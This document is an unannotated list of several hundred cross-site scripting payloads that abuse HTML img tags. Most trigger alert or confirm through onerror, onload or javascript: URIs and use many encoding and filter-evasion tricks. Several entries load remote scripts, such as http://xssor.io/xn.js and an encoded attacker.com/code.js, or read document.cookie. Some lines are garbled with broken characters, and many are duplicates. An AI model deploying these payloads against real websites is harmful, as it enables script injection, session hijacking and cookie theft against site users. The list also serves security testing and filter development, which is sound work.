- <IMG LOW id=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG LOWid=XSS SRC=”javascript:alert(‘XSS’)”>
- <IMG+LOWSRC=”javascript:alert(1);”>
- <IMG LOWSRC=”javascript:alert(‘XiSS’)”>
- <;IMG LOWSRC=”;javascript:alert(‘;XSS’;);”;>;
- <IMG LOWSRC=”javascript:alert(‘XSS’);”>
- <IMG LOWSRC=”javascript:alert(‘XSS’)”>
- <IMG LOWSRC=\”javascript:alert(‘XSS’)\”>
- <IMG LOWSRC=”javascript:confirm(document.location)”>
- <img LOWSRC=”javascript:document.vulnerable=true;”>
- <IMG LOWSRC=”javascript:javascript:alert(1)”>
- <IMG LOWSRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- ‘“><img onerror=alert(0) src=><”’
- <img onerror=alert(1) src <u></u>
- <img onerror=event.path.pop().alert(1) src>
- <img onerror=”location=’javascript:%61lert(1)’” src=”x”>
- <img onerror=”location=’javascript:=lert(1)’” src=”x”>
- <img onerror=”location=’javascript:\x255Cu0061lert(1)’” src=”x” >
- <img onerror=”location=’javascript:\x2561lert(1)’” src=”x”>
- “/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
- “/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
- “/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
- “/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
- “/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
- “/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
- “/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
- “/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
- “/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
- <img onload=alert(1)>//INJECTX
- ><img onmouseover=alert(Xss)>
- ��><img onmouseover=alert(��Xss��)>
- ><img onmouseover=alert(Xss-By-Muhaddi)>
- <IMG onmouseover=”alert(‘xxs’)”>
- <IMG onmouseover=”alert(“xxs”)”>
- <IMG onmouseover =confirm(1)>
- <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
- <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
- <img =”><script>alert(1)</script>”>
- <img “””><script>alert(“XSS by \nxss”)</script><marquee><h1>XSS by xss</h1></marquee>
- <img><script>alert(‘xss’)</script>”>
- <;IMG “;”;”;>;<;SCRIPT>;alert(“;XSS”;)<;/SCRIPT>;”;>;
- <IMG ><SCRIPT>alert(XSS)</SCRIPT>>
- <IMG “””><SCRIPT>alert(‘XSS’)</SCRIPT>”>
- <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
- <IMG SRC=javascript:a&
- <IMG+SRC=javascript:alert('X')>
- <IMG SRC=javascript:alert('XSS')>
- <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t:&<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
- <img/src=`%00` /id=confirm(1) /onerror=eval(id)
- <img/src=%00 id=confirm(1) onerror=eval(id)
- <img src=`%00`
 onerror=alert(1)

- <img src=`%00`
 onerror=confirm(1)

- <img/src=`%00` onerror=this.onerror=confirm
- <img/src=`%00` onerror=this.onerror=confirm(1)
- <img/src=`%00` onerror=this.onerror=confirm(1)
- <img src=jav ascr	ipt:al ert(0)>
- <img src=jav ascr	ipt:i=”x=docu ment.createElement(‘\u0053\u0043\u0052\u0049\u0050\u0054’);x.src=’http://xssor.io/xn.js';x.defer=true;doc ument.getElementsByTagName('head')[0].appendChild(x)";execScri pt(i)>
- <img src=jav ascr	ipt:i=”x=document.createElement(‘script’);x.src=’http://xssor.io/xn.js';x.defer=true;document.getElementsByTagName('head')[0].appendChild(x)";execScript(i)>
- <img src=’0' onerror=with(document)body.appendChild(createElement(‘script’)).src=’domain.js’>
- \”><img Src=0x94 onerror=alert(0x000123)>
- <IMG SRC=javascript:alert(
- <IMG+SRC=javascript:alert('X')>
- <img src=”javascript:alert('XSS')”>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=javascript:alert('XSS')>
- IMG SRC=javascript:alert('XSS')>
- <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:ale&<WBR>#114;t('XS<WBR>;S')>
- <;IMG SRC=”; &;#14; javascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”  javascript:alert(‘XSS’);”>
- <IMG SRC=”  javascript:alert(‘XSS’);”>
- <IMG SRC=”  javascript:confirm(document.location);”>
- <img SRC=”  javascript:document.vulnerable=true;”>
- <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
- <img src=1 href=1 onerror=”javascript:alert(1)”></img>
- <img src=1 href=1 onerror=”javascript:alert(document.domain)”></img>
- <iMg srC=1 lAnGuAGE=VbS oNeRroR=mSgbOx(1)>
- <img src=’1' onerror=’alert(0)’ <
- <img src=’1' onerror/=alert(0) />
- <img src=’1'’onerror=’alert(0)’>
- <img src=’1'”onerror=”alert(0)”>
- <img src=’1'onerror=alert(0)>
- <img/src=’1'/onerror=alert(0)>
- <img src=”1" onerror=”alert(‘1’)”>
- <img src=”1" onerror=”alert(1)” />
- <img src=1 onerror=alert(1)>
- “]<img src=1 onerror=alert(1)>
- “><img src=1 onerror=alert(1)>.gif
- <img src=1 onerror=”alert(52)”
- <img src=1 onerror=alert(document.domain)>
- “]<img src=1 onerror=confirm(1)>
- <img src=1 onerror=’document.write(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,4747,97,116,116,97,99,107,101,114,46,99,111,109,47,99,111,100,101,46,106,115,34,62,60,47,115,99,114,105,112,116,62,39,41,59)));’>
- <img src=1 onerror=Function(“aler”+”t(documen”+”t.domain)”)()>
- /#<img src=1 onerror=javascript:confirm(3)>
- <img src=1 onerror=jQuery.getScript(“domain.js”)>
- <img src=’1' onerror=\x00alert(0) />
- <img src=’1' onerror\x00=alert(0) />
- <img src=’1' onerror\x0b=alert(0) />
- <img src=”1" onerror=”alert(1)” />
- <img src=”1" onnerror=”alert(1)”>
- <img src=’1' o\x00nerr\x00or=alert(0) />
- <img src=1 style=”font-fam\22onerror\3d alert\28 1\29\20 ily:’aaa’;\”>
- <img src=’1'\x00onerror=alert(0)>
- <img/src=@  onerror = prompt(‘1’)
- <img src=”5" onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
- <img src=”5"onerror=eval(“\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29”)></img>
- <img src=”a”
- <img/src=aaa.jpg onerror=prompt(1);
- <img/src=aaa.jpg onerror=prompt(1);>
- <img/src=aaa.jpg onerror=prompt(1);
- /> <img src=’aaa’ onerror=confirm(document.domain)>
- “/> <img src=’aaa’ onerror=confirm(document.domain)>
- <img src=��\����<a href=’��>����onerror=alert(9)>
- <img/src=”.”alt=””onerror=”alert(‘zombie’)”/>
- <img src=��\��a=��>��onerror=alert(9)>
- <img src=”a” onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
- <img src=a onerror=eval(String.fromCharCode(97,108,101,114,116,40,39,67,104,101,97,116,115,111,110,39,41))>
- <img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))>
- <img src=a onerror=setInterval(String[‘fromCharCode’](97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using the String.fromCharCode function
- <img src=asdf onerror=alert(document.cookie)>
- <img src attribute src=”data:image/svg+xml;base64,
- <img src=”blah>” onmouseover=”document.vulnerable=true;”>
- <img src=”blah”onmouseover=”document.vulnerable=true;”>
- <img src=<b onerror=alert(‘renwax23’);>
- <img src=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs= onload=alert(1)>
- <img src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”>
- <img / src = \ ‘dfdfd \’ // onerror = \ ‘alert (document.cookie) \ ‘>
- <img src=&{document.vulnerable=true;};>
- <img src=evil.swf>
- <img src=foo.png onerror=alert(/xssed/) />
- <img src=foo.png onerror=alert(/xssed/) />
- <img src=http://127.0.0.1/myspace.asp>
- <img/src=’http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
- <img+src=”http://localhost">
- <img src=”http://teamultimate.in/wp-content/uploads/2017/03/slide-main.png">
- <img src=��http://victim/newUser?name=<script>alert(1)</script>��/>
- <img src=http://victim/newUser?name=<script>alert(1)</script>/>
- <img src=”http://www.baidu.com/img/bdlogo.gif">
- <img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
- <img src=http://www.google.fr/images/srpr/logo3w.png onload=confirm(this.ownerDocument.cookie) width=0 height= 0 /> #
- <img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
- <IMG src=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <;IMG SRC=”;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
- <IMG SRC=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <img src=”http://www.w3schools.com/tags/planets.gif" width=”145" height=”126" alt=”Planets” usemap=”#planetmap”><map name=”planetmap”><area shape=”rect” coords=”0,0,145,126" a-=”>” href=”javascript:alert(-1)”></map>
- <img src=������id=’<img src=����>��onerror=alert(9)>
- <img src=��<img src=’<img src=.>��>��onerror=alert(9)>
- <! — <img src=” →<img src=x onerror=alert(1)//”>
- <![><img src=”]><img src=x onerror=alert(1)//”>
- <! — <img src=” →<img src=x onerror=alert(123)//”>
- <! — <img src=” →<img src=x onerror=alert(1)//”>//INJECTX
- <! — <img src=” →<img src=x onerror=alert(XSS)//”>
- <![><img src=”]><img src=x onerror=alert(XSS)//”>
- <! — <img src=” →<img src=x onerror=javascript:alert(1)//”>
- <![><img src=”]><img src=x onerror=javascript:alert(1)//”>
- <img src=i onerror=eval(jQuery.getScript(‘domain.js’))>
- <img src ?itworksonchrome?\/onerror = alert(1)>
- <img src ?itworksonchrome?\/onerror = alert(1)
- <img src ?itworksonchrome?\/onerror = alert(1)???
- <img src ?itworksonchrome?\/onerror = alert(1)
- <img src ?itworksonchrome?\/onerror = confirm(1)???
- <img src ?itworksonchrome?\/onerror = confirm(1)
- <img src=”jar:!/”>
- <IMG+SRC=”jav%09ascript:alert(1);”>
- <IMG+SRC=”jav%0dascript:alert(1);”>
- <IMG SRC=java%00script:confirm(document.location)>
- “<IMG src=java\0script:alert(\”XSS\”)>”;’ > out
- <iMgSRC = “JavaScript:alert(0);”>
- <img src=”javascript:alert(1)”>
- <IMG SRC=&{javascript:alert(1);};>
- <img src=”java&#script:alert(/1231/);”>
- <img src=”javascript:alert(2)”>
- ?img src=javascript:alert(document.domain)//.swf ?
- <img src=javascript:alert("XSS")>
- <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
- <IMG SRC=javascript:alert("XSS")>
- <IMG SRC=JaVaScRiPt:alert("XSS")>
- <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")>
- <;IMG SRC=`javascript:alert(“;RSnake says, ‘;XSS’;”;)`>;
- <IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`>
- <IMG SRC=`javascript:alert(“RSnake says### ‘XSS’”)`>
- <IMG SRC=javascript:alert(String.fromCharCode(88
- <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=javascript:alert(String.fromCharCode(88###83###83))>
- <IMG src=”javascript:alert(‘X13SS’)”
- <IMG src=”jav ascript:alert(‘XaSS’);”>
- <IMG src=”jav ascript:alert(‘XbSS’);”>
- <IMG src=”jav ascript:alert(‘XcSS’);”>
- <IMG src=” javascript:alert(‘XdSS’);”>
- <img src=”javascript:alert(‘XSS’);”>
- <img src=”javascript:alert(‘XSS’)”>
- <IMG src=”javascript:alert(‘XSS’);”>
- <IMG src=javascript:alert(‘XSS’)>
- <IMG src=JaVaScRiPt:alert(‘XSS’)>
- <IMG src=JaVaScRiPt:alert(“XSS”)>
- <;IMG SRC=”;javascript:alert(‘;XSS’;);”;>;
- <;IMG SRC=”;javascript:alert(‘;XSS’;)”;
- <;IMG SRC=javascript:alert(‘;XSS’;)>;
- <IMG SRC=” javascript:alert(‘XSS’);”>
- <IMG SRC=” javascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”jav ascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=”javascript:alert(‘XSS’)”
- <IMG SRC=jav ascript:alert(XSS);>
- <IMG SRC=javascript:alert(‘XSS’)>
- <IMG SRC=javascript:alert(“XSS”)>
- <IMG SRC=javascript:alert(XSS)>
- <IMG SRC=javascript:alert(XSS);>
- <IMG SRC=javascript:alert(XSS)
- <IMG SRC = “ j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
- <IMGSRC=”javascript:alert(‘XSS’)”>
- IMG SRC=”javascript:alert(‘XSS’);”>
- <IMG SRC=jAVasCrIPt:alert(XSS)>
- <;IMG SRC=JaVaScRiPt:alert(‘;XSS’;)>;
- <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- <IMG SRC=JaVaScRiPt:alert(“XSS”)>
- <IMG SRC=`javascript:confirm(1)`>
- <IMG SRC=`javascript:confirm(document.cookie)`>
- <IMG SRC=”jav ascript:confirm(document.location);”>
- <IMG SRC=”javascript:confirm(document.location);”>
- <IMG SRC=”javascript:confirm(document.location)”
- <IMG SRC=javascript:confirm(document.location)>
- <IMG SRC=JaVaScRiPt:confirm(document.location)>
- <IMG SRC=javascript:confirm("XSS")>
- <IMG SRC=JaVaScRiPt:confirm("XSS<WBR>")>
- <IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>
- <img src=”javascript:document.vulnerable=true;”>
- <img SRC=”jav ascript:document.vulnerable=true;”>
- <img SRC=”javascript:document.vulnerable=true;”>
- <img SRC=”javascript:document.vulnerable=true;”
- <IMG SRC=`javascriptGalert(“)`>
- <IMG SRC=`javascriptGalert(“Look its, ‘XSS’”)`>
- <IMG SRC=`javascriptGalert(\”XSS\”)`>
- <IMG SRC=`javascript:javascript:alert(1)`>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”jav ascript:javascript:alert(1);”>
- <IMG SRC=”javascript:javascript:alert(1);”>
- <IMG SRC=”javascript:javascript:alert(1)”
- <IMG SRC=javascript:javascript:alert(1)>
- <IMG SRC=javascript:prompt(document.location)>
- <IMG SRC=JaVaScRiPt:prompt(document.location)>
- <img src=javascript:while([{}]);>
- “><img src=javascript:while([{}]);>
- <IMG SRC=javascrscriptipt:alert(‘XSS’)>
- <img src=javcript:alert(/1231/);>
- <IMG SRC=jav..?..S’)>
- <IMG+SRC=”jav	ascript:alert(1);”>
- <IMG SRC=”jav	ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”><IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”>
- <;IMG SRC=”;jav&;#x09;ascript:alert(‘;XSS’;);”;>;
- <;IMG SRC=”;jav	ascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”jav	ascript:alert(‘XSS’);”>
- <IMG SRC=”jav	ascript:alert(‘XSS’);”>
- <IMG SRC=\”jav	ascript:alert(‘XSS’);\”>
- <IMG SRC=jav	ascript:alert(XSS);>
- <IMG SRC=”jav	ascript:confirm(document.location);”>
- <IMG SRC=”jav	ascript:confirm(<WBR>document.location);”>
- <IMG+SRC=”jav
ascript:alert(1);”>
- <IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”>
- <;IMG SRC=”;jav&;#x0A;ascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=”jav
ascript:confirm(document.location);”>
- <IMG SRC=”jav
ascript:confirm(<WBR>document.location);”>
- <IMG+SRC=”jav#x0D;ascript:alert(1);”>
- <IMG SRC=”jav
ascript:alert(<WBR>’XSS’);”>
- <;IMG SRC=”;jav&;#x0D;ascript:alert(‘;XSS’;);”;>;
- <IMG SRC=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC=”jav
ascript:alert(‘XSS’);
- <IMG SRC=\”jav
ascript:alert(‘XSS’);\”>
- <IMG SRC=”jav
ascript:confirm(document.location);”>
- <IMG SRC=”jav
ascript:confirm(<WBR>document.location);”>
- <IMG+SRC=jAvascript:alert(1)>
- <IMG src=”livescript:[code]”>
- <;IMG SRC=”;livescript:[code]”;>;
- <IMG SRC=”livescript:[code]”>
- <IMG SRC=”livescript:[code][/code]”>
- <IMG SRC=”livescript:[code]”> (Netscape only; legacy scheme, not handled by current browsers)
- <img src=”livescript:document.vulnerable=true;”>
- <img src=”Mario Heiderich says that svg SHOULD not be executed trough image tags” onerror=”javascript:document.write(‘\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u
0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e’);”></img>
- <img/src=”mars.png”alt=”mars”>
- <IMG src=”mocha:[code]”>
- <;IMG SRC=”;mocha:[code]”;>;
- <IMG SRC=”mocha:[code]”>
- <IMG SRC=”mocha:[code]”> (Netscape only; legacy scheme, not handled by current browsers)
- <img src=”mocha:document.vulnerable=true;”>
- #”><img src=M onerror=alert(‘XSS’);>
- <IMG SRC_NeatHtmlReplace=”  javascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- <IMG SRC_NeatHtmlReplace=”javascript:alert("XSS")”>
- <IMG SRC_NeatHtmlReplace=”javascript:alert(String.fromCharCode(88,83,83))”>
- <IMG SRC_NeatHtmlReplace=” j a v a s c r i p t : a l e r t ( ‘ X S S ‘ ) “ >
- <IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
- <IMG SRC_NeatHtmlReplace=”JaVaScRiPt:alert(‘XSS’)”>
- <IMG SRC_NeatHtmlReplace=”jav	ascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”jav
ascript:alert(‘XSS’);”>
- <IMG SRC_NeatHtmlReplace=”livescript:[code]”>
- <IMG SRC_NeatHtmlReplace=”mocha:[code]”>
- <IMG SRC_NeatHtmlReplace=’vbscript:msgbox(“XSS”)’>
- <img src=``
 onerror=alert(1)

- <img src=N onerror=eval(javascript:document.write(unescape(‘ <script src=”domain.js”></script>’));)>
- <IMG SRC=”/” onerror=javascript:alert('XSS')>
- ←`<img/src=` onerror=alert(1)> — !>
- ←`<img/src=` onerror=alert(1)> — !>
- <img src=/ onerror=alert(1)>
- <img+src+onerror=alert(1)>
- <img src=��>��onerror=alert(9)>
- <IMG SRC=/ onerror=”alert(String.fromCharCode(88
- <IMG SRC=/ onerror=”alert(String.fromCharCode(88,83,83))”></img>
- <img src onerror /” ‘“= alt=alert(1)//”>
- <img src onerror /” ‘“= alt=javascript:alert(1)//”>
- ←`<img/src=` onerror=confirm(1)> — !>
- <img/ src//’onerror/’’/=confirm(1)//’>
- <img/src=` onerror=confirm(1)>
- “<img/src=` onerror=confirm(1)>”
- “>←`<img/src=` onerror=confirm(1)> — !>
- “><img src=”” onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
- “><img src=””onerror=”document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))”>
- <img src=”#” onerror=”$.getScript(‘domain.js’)”>
- <IMG SRC=”/” onerror=”jav	ascript:alert(‘XSS’);”>
- <img/ src=`~` onerror=prompt(1)>
- <img/src=@ onerror = prompt(‘1’)
- <img/src=`` onerror=this.onerror=confirm(1)
- <img/src=`` onerror=this.onerror=confirm(1)
- <img src=”#” onerror=”var a=String.fromCharCode(47);$.getScript(a+a+’domain.sj’+a+’4091')”>
- <img src=# onerror\x3D”javascript:alert(1)” >
- <IMG SRC=”/” onerror=javascript:alert('XSS')>
- <IMG SRC=/ onkeydown=”alert(String.fromCharCode(88,83,83))”></img>
- <IMG SRC=/ onkeypress=”alert(String.fromCharCode(88,83,83))”></img>
- <IMG SRC=/ onkeyup=”alert(String.fromCharCode(88,83,83))”></img>
- <IMG SRC=/ onload=”alert(String.fromCharCode(88,83,83))”></img>
- <img src=//\ onload=confirm(1)>
- <img src=”#” onload=”s=document.createElement(‘script’);s.src=’domain.js’+Math.random();document.body.appendChild(s)” border=”0">
- <IMG SRC= onmouseover=”alert(‘xxs’)”>
- <IMG SRC= onmouseover=”alert(“xxs”)”>
- <IMG SRC=# onmouseover=”alert(‘xxs’)”>
- <IMG SRC=# onmouseover=”alert(“xxs”)”>
- <img/src=q onerror=’new Function`al\ert\`1\``’>
- <img/src=q onerror=’new Function`al\ert\`OPENBUGBOUNTY\``’>
- <img/src=renwax23%0A/**/onerror=eval(‘al’%2b’ert(1)’)>
- <img src=””><SCRIPT/ASYNC/SRC=”/a3a?a?L”>
- <img src=” →</script><svg/onload=alert(1)//”>
- <img src=” →</script><svg/onload=alert(1)//”><! — <script>
- <img srcset=popup=1; onerror=popup=1;>
- <img src=”test.jpg” alt =”``onload=xss()”>
- <img src=test.jpg?value=”>Yes, we are still inside a tag!”>
- <img src=’test’ onmouseover=’alert(2)’>
- <img src=”/” =_=” title=”onerror=’/**/prompt(1)’”>
- <img src=”/” =_=” title=”onerror=’prompt(1)’”>
- “><img src=”/” =_=” title=”onerror=’prompt(1)’”>
- <img SRC=’vbscript:document.vulnerable=true;’>
- <IMG SRC=’vbscript:msgbox(“anyunix”)’>
- <IMG SRC=’vbscript:msgbox(document.location)’>
- <IMG src=’vbscript:msgbox(“XmSS”)’>
- <;IMG SRC=’;vbscript:msgbox(“;XSS”;)’;>;
- <IMG SRC=’vbscript:msgbox(“XSS”)’>
- <IMG SRC=’vbscript:msgbox(“XSS”)’>
- <IMG SRC=’vbscript:msgbox(\”XSS\”)’>
- <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
- <img src\x00=x onerror=”javascript:alert(1)”>
- <img src\x09=x onerror=”javascript:alert(1)”>
- “><img/src=x%0Aonerror=prompt`1`>
- <img src\x10=x onerror=”javascript:alert(1)”>
- <img src\x11=x onerror=”javascript:alert(1)”>
- <img src\x12=x onerror=”javascript:alert(1)”>
- <img src\x13=x onerror=”javascript:alert(1)”>
- `”’><img src=’#\x27 onerror=javascript:alert(1)>
- <img src\x32=x onerror=”javascript:alert(1)”>
- <img src\x47=x onerror=”javascript:alert(1)”>
- <img src=”http://www.baidu.com/img/bdlogo.gif”;>
- <IMG SRC=java..?..XSS')>
- <IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert(&<WBR>#x27XSS')>
- <IMG src=javascript:alert('XSS')>
- <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
- <IMG SRC=javascript:alert('XSS')>
- <img src=”x:%90" title=”onerror=alert(1)//”>
- <img src=x[9,10,12,13,32]onerror=”alert(1)”>
- <img src=x:alert(alt) onerror=eval(src) alt=0>
- <img src=x:alert(alt) onerror=eval(src) alt=xss>
- <img src=”x:alert” onerror=”eval(src%2b’(0)’)”>
- <img src=”x:alert” onerror=”eval(src%2b’(1)’)”>
